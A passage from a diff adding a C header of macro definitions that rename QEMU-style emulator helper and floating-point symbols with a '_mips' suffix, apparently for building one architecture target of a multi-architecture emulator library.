+#define floatx80_to_float64 floatx80_to_float64_mips +#define floatx80_to_int32 floatx80_to_int32_mips +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips +#define floatx80_to_int64 floatx80_to_int64_mips +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips +#define floatx80_unordered floatx80_unordered_mips +#define floatx80_unordered_quiet floatx80_unordered_quiet_mips +#define flush_icache_range flush_icache_range_mips +#define format_string format_string_mips +#define fp_decode_rm fp_decode_rm_mips +#define frame_dummy frame_dummy_mips +#define free_range free_range_mips +#define fstat64 fstat64_mips +#define futex_wait futex_wait_mips +#define futex_wake futex_wake_mips +#define gen_aa32_ld16s gen_aa32_ld16s_mips +#define gen_aa32_ld16u gen_aa32_ld16u_mips +#define gen_aa32_ld32u gen_aa32_ld32u_mips +#define gen_aa32_ld64 gen_aa32_ld64_mips +#define 
gen_aa32_ld8s gen_aa32_ld8s_mips +#define gen_aa32_ld8u gen_aa32_ld8u_mips +#define gen_aa32_st16 gen_aa32_st16_mips +#define gen_aa32_st32 gen_aa32_st32_mips +#define gen_aa32_st64 gen_aa32_st64_mips +#define gen_aa32_st8 gen_aa32_st8_mips +#define gen_adc gen_adc_mips +#define gen_adc_CC gen_adc_CC_mips +#define gen_add16 gen_add16_mips +#define gen_add_carry gen_add_carry_mips +#define gen_add_CC gen_add_CC_mips +#define gen_add_datah_offset gen_add_datah_offset_mips +#define gen_add_data_offset gen_add_data_offset_mips +#define gen_addq gen_addq_mips +#define gen_addq_lo gen_addq_lo_mips +#define gen_addq_msw gen_addq_msw_mips +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mips +#define gen_arm_shift_im gen_arm_shift_im_mips +#define gen_arm_shift_reg gen_arm_shift_reg_mips +#define gen_bx gen_bx_mips +#define gen_bx_im gen_bx_im_mips +#define gen_clrex gen_clrex_mips +#define generate_memory_topology generate_memory_topology_mips +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mips +#define gen_exception gen_exception_mips +#define gen_exception_insn gen_exception_insn_mips +#define gen_exception_internal gen_exception_internal_mips +#define gen_exception_internal_insn gen_exception_internal_insn_mips +#define gen_exception_return gen_exception_return_mips +#define gen_goto_tb gen_goto_tb_mips +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mips +#define gen_helper_add_saturate gen_helper_add_saturate_mips +#define gen_helper_add_setq gen_helper_add_setq_mips +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mips +#define gen_helper_clz32 gen_helper_clz32_mips +#define gen_helper_clz64 gen_helper_clz64_mips +#define gen_helper_clz_arm gen_helper_clz_arm_mips +#define gen_helper_cpsr_read gen_helper_cpsr_read_mips +#define gen_helper_cpsr_write gen_helper_cpsr_write_mips +#define gen_helper_crc32_arm gen_helper_crc32_arm_mips +#define gen_helper_crc32c gen_helper_crc32c_mips +#define 
gen_helper_crypto_aese gen_helper_crypto_aese_mips +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mips +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mips +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mips +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mips +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mips +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mips +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mips +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mips +#define gen_helper_double_saturate gen_helper_double_saturate_mips +#define gen_helper_exception_internal gen_helper_exception_internal_mips +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mips +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mips +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mips +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mips +#define gen_helper_get_user_reg gen_helper_get_user_reg_mips +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mips +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mips +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mips +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mips +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mips +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mips +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mips +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mips +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mips +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mips +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mips +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mips +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mips +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mips +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mips +#define 
gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mips +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mips +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mips +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mips +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mips +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mips +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mips +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mips +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mips +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_mips +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mips +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mips +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mips +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mips +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mips +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mips +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mips +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mips +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mips +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mips +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mips +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mips +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mips +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mips +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mips +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mips +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mips +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mips +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mips +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mips +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mips +#define gen_helper_iwmmxt_msbb 
gen_helper_iwmmxt_msbb_mips +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mips +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mips +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mips +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mips +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mips +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_mips +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mips +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mips +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mips +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mips +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mips +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mips +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mips +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_mips +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mips +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mips +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mips +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mips +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mips +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mips +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mips +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mips +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mips +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mips +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mips +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mips +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mips +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mips +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mips +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mips +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mips +#define gen_helper_iwmmxt_subnb 
gen_helper_iwmmxt_subnb_mips +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mips +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mips +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mips +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mips +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_mips +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mips +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mips +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mips +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mips +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mips +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mips +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_mips +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mips +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mips +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mips +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mips +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mips +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mips +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mips +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mips +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mips +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mips +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mips +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mips +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mips +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mips +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mips +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mips +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mips +#define gen_helper_neon_abdl_s64 
gen_helper_neon_abdl_s64_mips +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mips +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mips +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mips +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_mips +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mips +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mips +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mips +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mips +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mips +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mips +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mips +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mips +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mips +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mips +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mips +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mips +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mips +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mips +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mips +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mips +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mips +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mips +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mips +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mips +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mips +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mips +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mips +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mips +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mips +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mips +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mips 
+#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mips +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mips +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mips +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mips +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mips +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_mips +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mips +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mips +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_mips +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mips +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mips +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mips +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_mips +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mips +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mips +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mips +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mips +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mips +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mips +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mips +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mips +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mips +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mips +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mips +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mips +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mips +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mips +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mips +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mips +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mips +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mips +#define gen_helper_neon_max_u8 
gen_helper_neon_max_u8_mips +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mips +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_mips +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mips +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mips +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_mips +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mips +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mips +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mips +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mips +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mips +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mips +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mips +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mips +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mips +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mips +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mips +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mips +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mips +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mips +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_mips +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mips +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mips +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mips +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mips +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mips +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mips +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mips +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mips +#define gen_helper_neon_paddl_u16 
gen_helper_neon_paddl_u16_mips +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_mips +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mips +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mips +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mips +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_mips +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mips +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mips +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mips +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mips +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mips +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mips +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mips +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mips +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mips +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mips +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mips +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mips +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mips +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mips +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mips +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mips +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mips +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mips +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mips +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mips +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mips +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mips +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mips +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mips +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mips +#define gen_helper_neon_qrdmulh_s32 
gen_helper_neon_qrdmulh_s32_mips +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mips +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mips +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_mips +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mips +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mips +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mips +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mips +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mips +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mips +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mips +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mips +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mips +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mips +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mips +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mips +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mips +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mips +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mips +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mips +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mips +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mips +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mips +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mips +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mips +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mips +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mips +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mips +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mips +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mips +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_mips +#define gen_helper_neon_qunzip8 
gen_helper_neon_qunzip8_mips +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_mips +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_mips +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mips +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mips +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mips +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mips +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mips +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mips +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mips +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mips +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mips +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mips +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mips +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mips +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mips +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mips +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mips +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mips +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mips +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mips +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mips +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mips +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mips +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mips +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mips +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mips +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mips +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mips +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mips +#define gen_helper_neon_tbl gen_helper_neon_tbl_mips +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_mips +#define gen_helper_neon_tst_u32 
gen_helper_neon_tst_u32_mips +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mips +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mips +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mips +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mips +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mips +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mips +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mips +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mips +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mips +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mips +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mips +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mips +#define gen_helper_pre_hvc gen_helper_pre_hvc_mips +#define gen_helper_pre_smc gen_helper_pre_smc_mips +#define gen_helper_qadd16 gen_helper_qadd16_mips +#define gen_helper_qadd8 gen_helper_qadd8_mips +#define gen_helper_qaddsubx gen_helper_qaddsubx_mips +#define gen_helper_qsub16 gen_helper_qsub16_mips +#define gen_helper_qsub8 gen_helper_qsub8_mips +#define gen_helper_qsubaddx gen_helper_qsubaddx_mips +#define gen_helper_rbit gen_helper_rbit_mips +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mips +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mips +#define gen_helper_recps_f32 gen_helper_recps_f32_mips +#define gen_helper_rintd gen_helper_rintd_mips +#define gen_helper_rintd_exact gen_helper_rintd_exact_mips +#define gen_helper_rints gen_helper_rints_mips +#define gen_helper_rints_exact gen_helper_rints_exact_mips +#define gen_helper_ror_cc gen_helper_ror_cc_mips +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mips +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_mips +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mips +#define gen_helper_sadd16 gen_helper_sadd16_mips +#define gen_helper_sadd8 gen_helper_sadd8_mips +#define gen_helper_saddsubx 
gen_helper_saddsubx_mips +#define gen_helper_sar_cc gen_helper_sar_cc_mips +#define gen_helper_sdiv gen_helper_sdiv_mips +#define gen_helper_sel_flags gen_helper_sel_flags_mips +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mips +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mips +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mips +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mips +#define gen_helper_set_rmode gen_helper_set_rmode_mips +#define gen_helper_set_user_reg gen_helper_set_user_reg_mips +#define gen_helper_shadd16 gen_helper_shadd16_mips +#define gen_helper_shadd8 gen_helper_shadd8_mips +#define gen_helper_shaddsubx gen_helper_shaddsubx_mips +#define gen_helper_shl_cc gen_helper_shl_cc_mips +#define gen_helper_shr_cc gen_helper_shr_cc_mips +#define gen_helper_shsub16 gen_helper_shsub16_mips +#define gen_helper_shsub8 gen_helper_shsub8_mips +#define gen_helper_shsubaddx gen_helper_shsubaddx_mips +#define gen_helper_ssat gen_helper_ssat_mips +#define gen_helper_ssat16 gen_helper_ssat16_mips +#define gen_helper_ssub16 gen_helper_ssub16_mips +#define gen_helper_ssub8 gen_helper_ssub8_mips +#define gen_helper_ssubaddx gen_helper_ssubaddx_mips +#define gen_helper_sub_saturate gen_helper_sub_saturate_mips +#define gen_helper_sxtb16 gen_helper_sxtb16_mips +#define gen_helper_uadd16 gen_helper_uadd16_mips +#define gen_helper_uadd8 